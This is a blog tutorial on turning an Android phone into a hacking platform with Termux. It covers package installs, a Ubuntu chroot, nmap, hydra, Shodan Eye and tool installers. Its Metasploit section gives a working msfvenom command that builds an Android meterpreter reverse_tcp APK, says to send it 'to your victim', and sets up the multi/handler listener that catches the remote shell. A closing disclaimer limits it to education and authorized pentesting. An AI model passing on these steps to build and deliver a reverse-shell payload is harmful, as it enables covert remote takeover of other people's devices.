ANDROID HACKING WITH TERMUX

If you want to immerse yourself more about how to hack with Android, then Termux is a very good "App" to use an discover. I have been using it for a long time and I still love to see what you can do with it ! And that with or without root privileges.

Because the possibilities with Termux are almost unlimited, I would not be able to cover everything in this article, but I will try my level best to provide you a good start.

Termux is a terminal emulator for Android with a Linux environment. A minimal base system is installed automatically and additional packages are available using the apt and dpkg package management, similar to Debian or Ubuntu.

Termux is only available on Android 5.0 or later

Features Termux Application

  • Secure
  • Customizable
  • Ready to Scale Up
  • Programming

Termux has some Extra features

  • Termux API
  • Termux Boot
  • Termux Float
  • Termux Styling
  • Termux Task
  • Termux Widget
INSTALL TERMUX

Open the Termux App in the Google Play Store https://play.google.com/store/apps/details?id=com.termux and click on download. After the Termux App is installed, you first have to do a update and a upgrade exactly like in a normal Linux system.

INSTALLING PACKAGES FROM APT REPOSITORY

In Termux it is recommended to use package manager pkg which is a wrapper for apt. It simplifies installing or upgrading packages by automatically updating apt lists so you don't have to type apt update when installing or upgrading packages.

For myself I always use the apt instead of pkg a kind of getting used to it. Here in this article I would give a good example using pkg, but as you can see on the pictures, I am using on my side apt :-D

pkg update && pkg upgrade

For more information about available commands, you can either just run pkg without arguments or using help argument:

pkg help
apt help

Warning: If you prefer to use apt over pkg - never run it as root as you will mess up file permissions and SELinux contexts so you won't be able to use it as a normal user.

android-hacking-with-termux

As you see above, Termux looks exactly like a Terminal in Linux and you can compare Termux with a minimal Linux Installation where you can install everything yourself and set up the way you like it.

Just like with Linux you can use the help function

(package) --help

Or install man for the manual pages

pkg install man

List all packages

pkg list-all
INSTALL PYTHON AND PIP
pkg install python2
pkg install python-pip
INSTALL PYTHON3 AND PIP3
pkg install python3
pkg install python3-pip
INSTALL SOME TEXT EDITORS
pkg install nano
pkg install vim
pkg install emacs
pkg install micro
Storage Settings

To grant storage permissions in Android go to Settings > Apps > Termux > Permissions and select storage, then run termux-setup-storage in Termux.

To access shared and external storage you need to run

termux-setup-storage

You will then be prompted to "Allow Termux access photos, media and files on your device", which you should allow. Executing termux-setup-storage ensures that permission to shared storage is granted to Termux when running on Android 6.0 or later. That an app-private folder on external storage is created (if external storage exists).

INSTALL METASPLOIT FRAMEWORK

Just copy and paste the below command in Termux:

curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh

Then give it the permission to run:


chmod +x metasploit.sh

Then start the installation process. (It will take some time to install the Metasploit framework)

./metasploit.sh

To start simply type:

msfconsole

Use Metasploit

msfvenom -p android/meterpreter/reverse_tcp LHOST=(Wlan\'s inet) LPORT=4444 R > /sdcard/test.apk

Wlan's Inet is the IP address your connection is currently using. To know your Wlan's inet open a new session and type ifconfig and copy the inet of the Wlan and paste it into your payload (after LHOST=). Go to your file manager then find your payload name{test.apk} then send it to your victim.

The following step is to run metasploit-framework type this commands

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (Wlan\'s inet)* set lport 4444
exploit

If the target is downloading the payload, you will see the meterpreter session starting. As usual with the "help" function you can see all the available commands.

android-hacking-with-termux

INSTALL UBUNTU ON ANDROID

Ubuntu chroot for Termux. This chroot provide the latest Ubuntu version (19.04 Disco Dingo). But before you use it, you need to install Wget and PRoot to install Ubuntu chroot in Termux.

pkg install proot wget

After you install Wget and PRoot, you can install Ubuntu chroot using this command:

mkdir -p ~/jails/ubuntu
cd ~/jails/ubuntu
wget https://raw.githubusercontent.com/Neo-Oli/termux-ubuntu/master/ubuntu.sh
bash ubuntu.sh

Or

./ubuntu.sh

After Ubuntu chroot downloaded, you can run it by executing ./start-ubuntu.sh. If you are already inside your $HOME directory, you can run it with this command:

bash jails/ubuntu/start-ubuntu.sh

After install the Ubuntu environment, you have to un-minimize the setup run:

unminimize

To turn on our Termux with some good pentest tool we will need first to install some primary packages as well, which will be required later.

apt install git net-tools curl
INSTALL W3M

w3m is a text-based web browser as well as a pager like more' orless'. With w3m you can browse web pages through a terminal emulator window (xterm, rxvt or something like that). Moreover, w3m can be used as a text formatting tool which typesets HTML into plain text.

pkg install w3m
w3m --help
man w3m
w3m google.com
# To exit press ctrl + z
INSTALL SL

You will be see a moving train which you can control if the setup of Termux is running.

pkg install sl

android-hacking-with-termux

INSTALL TOP

"top" command allow you to see all the running processes.

pkg install top
# Type --help for more info
# Type -q to quite the program
INSTALL FIGLET
pkg install figlet

Usage

figlet Dotweak.com
INSTALL CMATRIX

With this awesome terminal, you can really impress all your friends.

pkg install cmatrix
Install Toilet
pkg install toilet

Usage


toilet Dotweak.com
toilet -f mono12 -F gay Dotweak
INSTALL VARIOUS HACKING TOOLS ON TERMUX

Warning: There are a lot of "Termux Hacking Tutorials" on the Internet which provide suspicious software meant to be used as hacking tools. Most of them are just clickbait and don't actually work. Some of them force users to install malware on their devices.

Tools like aircrack-ng or tcpdump can be found in the Termux Root Packages repository. But remember that Aircrack-ng requires wifi monitor mode which is not available in most devices.

INSTALL NMAP

Utility for Network Discovery, Security Scanner, Port Scanner, & Network Exploration Tool.

pkg install nmap

Usage

nmap 127.0.0.1
INSTALL HYDRA

Hydra is one of the best password cracking and brute-forcing tool. It supports different services like telnet, ssh, ftp, etc. More information can be found in them official GitHub repository.

pkg install hydra
INSTALL SHODAN EYE**

I succeeded installing Shodan Eye, for which I installed it in the Termux Ubuntu environment. It works without any errors

git clone https://github.com/BullsEye0/shodan-eye.git
cd shodan-eye
pip install -r requirements.txt

Usage

python shodan-eye
# You will be asked for a Shodan API key

android-hacking-with-termux

INSTALLING GITHUB “HACKING TOOLS” ON YOUR TERMUX

There are a number of GitHub tool available. Please note, if your Android phone is not rooted then some of these tools will not work. In this article we did not talk about rooting a mobile phone. Maybe we will come back to this later in another article.

INSTALL LAZYMUX

Lazymux tools installer is very easy to use, only provided for lazy termux users.

git clone https://github.com/Gameye98/Lazymux
cd Lazymux
python2 lazymux.py

android-hacking-with-termux

Install Toolx

Tool-X is a Kali Linux Tool installer. In the Tool-X there are 250+ hacking tools available for Termux. You can install any tool by single click. Tool-X is specially made for Termux and GNURoot Debian Terminal. Tool-X is also available for Ubuntu.

git clone https://github.com/Rajkumrdusad/Tool-X.git
cd Tool-X
chmod +x install.aex
sh install.aex

Or

./install.aex

Usage

Tool-X

android-hacking-with-termux

IMPORTANT THINGS TO REMEMBER
  • This article was written for educational purpose and pen-test only.
  • The author can not be held responsible for damages caused by the use of these resources.
  • You will not misuse the information to gain unauthorized access.
  • This information shall only be used to expand knowledge and not for causing malicious or damaging attacks.
  • Performing any hacks without written permission is illegal.

Conclusion

There is so much to tell about what you all can do with your mobile phone and Termux and it’s so much fun and great. I really hope you have learned something from this article so that you can apply it.

If you have any questions about this article or if you want to share your thoughts with us, please feel free to do it using the below comment form.